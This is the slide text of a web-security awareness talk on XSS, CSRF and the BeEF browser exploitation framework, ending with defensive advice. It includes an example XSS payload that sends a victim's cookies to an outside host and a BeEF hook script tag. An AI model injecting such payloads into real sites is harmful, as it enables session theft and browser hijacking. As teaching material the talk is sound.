Date post: | 12-Nov-2014 |
Category: |
Technology |
Upload: | awiasecretary |
View: | 742 times |
Download: | 0 times |
It’s 10pm,do you know where your browser is?
Christian @xntrik Frichot
1
Hi - I’m Christian ..
2
SCARY
3
Cute ;)
Enhancing Lives
4
Why are we here?
I <3 U
5
And we lurve the Internet
>=] <3 U
6
But so do bad-guys
Online Banking
7
Online Bank Robbery
8
Way easier these days..
Online Communication
9
Online Romance
10
Online Heart Robbery
11
Way easier.
12
Sad?
13
Sadder!
Browsers & Web Apps
14
But this is what we’re talking about..
Browser
15
Browsers
Web Apps
16
Web apps
17
OVERVIEW
The Ubiquitous Web&
its Imperfect Trust Model
18
1
Malicious ActorsDo Malicious Things
19
2
You already deploy defences
(even if you don’t know it)
Let’s bolster them
20
3
Ubiquitous
21
The Internet is pervasive and ubiquitous
22
People who ‘support’ the ecosystem are multiplying
Lots of people
Lots of browsers23
Lots of attack surface
!eCommerce
Commerce!
24
Why?
25
Attackers don’t care, just seeing victims.
26
But it’s broken
27
What does this mean?
28
So how is my mum meant to know that this doesn’t mean the same thing??
http://www.usablesecurity.org/papers/jackson.pdf
29
Yup .. a fake frame inside someone else’s site..
Domains are mixed
30
31
Traditional security models just don’t work in this new age.
Bell-LaPadula ?
32
Same Origin Policy
33
Closest we have?
34
In the end though ..
The browser will do what the server says.The server will do what the browser says
It’s Mighty (confusing)
35
The browser is mighty - and it’s used by all of us ...
36
and it’s confusing..
So just how bad is the bad stuff the bad
people do?
37
38
OWASP, the Open Web Application Security Project, try to categorise the top 10 riskiest web security weaknesses.
Known as the OWASP Top 10 it’s a great resource..
www.owasp.org
Cross Site Scripting(XSS)
39
In the OWASP Top 10 this comes in at number 2, and they describe it as so:“XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content”
Server code:
1. Take ‘greeting’ parameter
page.php?greeting=<input>
2. Dynamically print that out in the response
<p><?php echo $_GET[‘greeting’] ?></p>
40
What if greeting was:
<script>img=new Image();img.src='http://frichot.com/nom.php?cookie='+document.cookie;</script>
41
Words < Picture < Moving Picture
42
Demo
43
44
Cross Site Request Forgery(CSRF)
45
CSRF comes in at number 5 in the OWASP Top 10.. described as:“Since browsers send credentials like session cookies automatically, attackers can create malicious web pages which generate forged requests that are indistinguishable from legitimate ones.”
46
ING Direct
47
https://www.eecs.berkeley.edu/~daw/teaching/cs261-f11/reading/csrf.pdf 2008
Without prior knowledge of secret or
random tokens
48
If you were online performing banking
49
And your browser rendered content from
elsewhere
50
They could automatically transact
your funds away
51
52
GET request to Add New Contact page
POST request to add the contact
POST request to confirm the new contact
POST request to create payment to contact
POST request to confirm payment
53
54
Samy Wanted Friends
55
56
This is lovely, but this is manual
57
This all seems very hands on..
http://beefproject.com
58
Let me introduce you to BeEF....
The Browser Exploitation Framework ..
59
The architecture looks a little bit like this.
60
Beef is currently made up of 3 main components:Core, Extensions & Moduleshttp://img4.cookinglight.com/i/2009/01/0901p40f-beef-patty-m.jpg?300:300
61
Firstly is the core..http://www.imdb.com/media/rm1627756544/tt0298814
Central API
Filters
Primary client-side JS
Server-side asset handling Web servicing
Ruby extensions
Database models
Hooking methods for Extensions & Modules
CORE
62
! - The Core! ! - Central API! ! - Filters! ! - Primary client-side javascript! ! - Server-side asset handling and web servicing! ! - Ruby extensions! ! - Database models! ! - Hooking methods to load and manage arbitrary extensions and command modules
Extensions
63
Extensions
Web UI
Console
Demo pages
Event handling Browser initialisation
Metasploit
Proxy/Requester
XSSRays
EXTENSIONS
64
65
Command Moduleshttp://www.mobiinformer.com/wp-content/uploads/2010/11/big_red_button.jpg
Browser
Debugging
Host Miscellaneous
Network
Persistence
Recon
Router
COMMAND MODULES
66
• XSS
• Social Engineering (i.e. tiny URL, or phishing via email)
• Embedding the payload (think drive-by-download)
• Maintaining persistence after already being hooked (think Tab BeEF Injection)
Hooking Browsers
67
<script src="http://beefserver.com/hook.js"></script>
68
This is pretty much all you need.
Demo
69
70
71
You can defend yourself
Multiple angles (angels?)
73
74
As a minimum ..
Your Baseline,Your Appetite
75
Determine your appetite and baseline
Update Your Frameworks
76
Use the latest versions of your framework, Rails, Django, .NET (MVC)
Monitor
http://www.ossec.net/
http://sucuri.net/
77
Be Prepared
http://tiny.cc/rubygemsresponse
78
Want Moar?
79
Dev Lifecycle +
Security
http://microsoft.com/sdl
80
Continuous Security
81
Brakeman
http://brakemanscanner.org/docs/presentations/
82
http://www.slideshare.net/xplodersuv/putting-your-robots-to-work-14901538
https://air.mozilla.org/minion-automating-security-for-developers/
Mozilla
http://www.slideshare.net/mimeframe/ruxcon-2012-15195589
83
You are not alone
84
Questions?
85
www.asteriskinfosec.com.au@asteriskinfosec@xntrik